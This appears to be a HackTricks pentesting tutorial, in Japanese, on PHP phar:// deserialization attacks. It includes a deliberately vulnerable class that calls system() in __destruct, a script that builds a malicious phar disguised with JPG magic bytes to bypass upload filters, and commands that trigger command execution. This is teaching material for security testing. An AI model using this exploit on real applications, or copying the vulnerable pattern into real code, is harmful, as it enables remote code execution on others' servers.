hacktricks/pentesting-web/file-inclusion/phar-deserialization.md

6 KiB
Raw Permalink Blame History

phar:// デシリアライズ

{% hint style="success" %} AWSハッキングを学び、実践するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践するHackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする
{% endhint %}

バグバウンティのヒントIntigritiサインアップしてください。これはハッカーによって、ハッカーのために作られたプレミアムバグバウンティプラットフォームです!今日、https://go.intigriti.com/hacktricksに参加し、最大**$100,000**のバウンティを獲得し始めましょう!

{% embed url="https://go.intigriti.com/hacktricks" %}

PharファイルPHPアーカイブファイルはシリアライズ形式のメタデータを含んでいます。したがって、解析されると、このメタデータデシリアライズされ、PHPコード内のデシリアライズ脆弱性を悪用しようとすることができます。

この特性の最も良い点は、**file_get_contents()、fopen()、file()、file_exists()、md5_file()、filemtime()、filesize()**のようなPHPコードを評価しないPHP関数を使用しても、このデシリアライズが発生することです。

したがって、任意のファイルのサイズを**phar://プロトコルを使用して取得するPHPウェブがある状況を想像してください。そして、コード内に次のようなクラス**が見つかります:

{% code title="vunl.php" %}

<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path

{% endcode %}

pharファイルを作成することができ、読み込まれるとこのクラスを悪用して任意のコマンドを実行します。次のように:

{% code title="create_phar.php" %}

<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

{% endcode %}

注意してください、JPGのマジックバイト\xff\xd8\xffがpharファイルの先頭に追加されて、可能なファイルアップロード制限回避しています。
test.pharファイルを次のようにコンパイルします:

php --define phar.readonly=0 create_phar.php

whoami コマンドを脆弱なコードを悪用して実行します:

php vuln.php

参考文献

{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}

バグバウンティのヒント: サインアップしてIntigritiに参加しましょう。これはハッカーによって、ハッカーのために作られたプレミアムバグバウンティプラットフォームです!今日、https://go.intigriti.com/hacktricksに参加して、最大**$100,000**のバウンティを獲得し始めましょう!

{% embed url="https://go.intigriti.com/hacktricks" %}

{% hint style="success" %} AWSハッキングを学び、実践するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践するHackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする
{% endhint %}